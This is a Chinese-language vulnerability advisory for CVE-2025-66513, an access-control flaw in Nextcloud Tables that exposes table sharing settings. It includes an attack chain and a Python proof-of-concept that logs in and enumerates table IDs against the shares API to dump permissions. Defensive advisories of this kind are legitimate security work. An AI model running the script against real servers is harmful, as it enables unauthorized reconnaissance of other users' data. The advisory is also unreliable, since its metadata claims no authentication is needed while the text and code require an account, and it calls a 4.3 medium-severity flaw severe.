CVE-2025-66513 Nextcloud Tables 表格共享权限信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-66513

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Nextcloud Tables

漏洞概述

Nextcloud Tables是Nextcloud云平台中的一个应用程序，允许用户创建自定义表格并定义各种类型的列。该应用在处理表格共享信息时存在严重的信息泄露漏洞。在0.8.9、0.9.6和1.0.1之前的版本中，系统未能正确限制用户对表格共享权限信息的访问权限。攻击者可以通过API接口获取系统中所有表格的共享配置详情，包括表格ID、共享的用户或用户组列表，以及各自主的权限级别等敏感信息。这种信息泄露可能使攻击者能够识别包含敏感业务数据的表格，从而为后续更严重的攻击（如数据窃取或未授权访问）提供侦察基础。由于该漏洞利用无需特殊权限且基于标准API接口，危害范围较广。建议受影响的用户立即升级到最新修复版本。

技术细节

该漏洞源于Nextcloud Tables应用在处理表格共享信息查询时的访问控制缺陷。正常业务流程中，只有表格所有者或具有管理权限的用户才能查看特定表格的共享配置。然而，在受影响的版本中，系统未对相关API端点进行充分的权限校验。攻击者可以直接构造API请求访问表格共享信息接口，系统会返回该表格的完整共享配置数据，包括：表格ID、已授权的用户列表、已授权的用户组列表、各用户和用户组的权限级别（如读取、写入、管理权限）。由于Nextcloud Tables采用RESTful API设计，且该接口缺少适当的权限验证逻辑，任何经过认证的用户都可以通过遍历表格ID的方式批量获取系统中所有表格的共享配置信息。这种设计缺陷使得敏感信息在未经授权的情况下被暴露。攻击者可以利用收集到的信息进行进一步的攻击侦查，识别包含敏感数据的表格目标。

攻击链分析

STEP 1

步骤1

攻击者获取有效的Nextcloud用户账户（可通过注册或社工手段获取）

STEP 2

步骤2

攻击者使用账户登录Nextcloud并获取会话认证信息

STEP 3

步骤3

攻击者构造API请求访问Nextcloud Tables的共享信息接口，遍历表格ID

STEP 4

步骤4

由于系统未进行充分权限校验，API返回目标表格的完整共享配置信息

STEP 5

步骤5

攻击者收集所有表格的共享信息，分析识别包含敏感数据的表格

STEP 6

步骤6

利用收集的信息规划进一步攻击，如针对高价值表格进行未授权数据访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests import json # CVE-2025-66513 PoC - Nextcloud Tables Information Disclosure # Target: Nextcloud instance with Tables app installed # This PoC demonstrates how an authenticated user can access # table sharing information without proper authorization TARGET_URL = "https://vulnerable-nextcloud.example.com" USERNAME = "[email protected]" PASSWORD = "password123" def exploit(): """ Exploit for CVE-2025-66513: Information disclosure via unauthorized access to table sharing configuration """ session = requests.Session() # Step 1: Authenticate to Nextcloud login_url = f"{TARGET_URL}/index.php/login" login_data = { "user": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Authentication failed") return print("[+] Authenticated successfully") # Step 2: Enumerate table IDs and fetch sharing information # The vulnerable endpoint exposes table sharing configuration # without proper authorization checks for table_id in range(1, 100): vulnerable_endpoint = f"{TARGET_URL}/ocs/v2.php/apps/tables/api/v1/tables/{table_id}/shares" headers = { "OCS-APIREQUEST": "true", "Accept": "application/json" } response = session.get(vulnerable_endpoint, headers=headers) if response.status_code == 200: try: data = response.json() if data.get("ocs") and data["ocs"].get("data"): shares = data["ocs"]["data"] if shares: print(f"\n[+] Table ID {table_id} sharing info:") print(json.dumps(shares, indent=2)) except json.JSONDecodeError: pass print("\n[!] Information disclosure complete") print("[!] Collected table sharing configurations without authorization") if __name__ == "__main__": exploit()

影响范围

Nextcloud Tables < 0.8.9

Nextcloud Tables < 0.9.6

Nextcloud Tables < 1.0.1

防御指南

临时缓解措施

如果无法立即升级，可通过Web应用防火墙限制对ocs/v2.php/apps/tables/api/v1/tables/*/shares路径的访问频率和来源IP，同时启用Nextcloud的详细审计日志功能，监控对表格共享信息的异常查询请求。建议在修复窗口期内密切监控系统日志，关注可能的信息泄露迹象。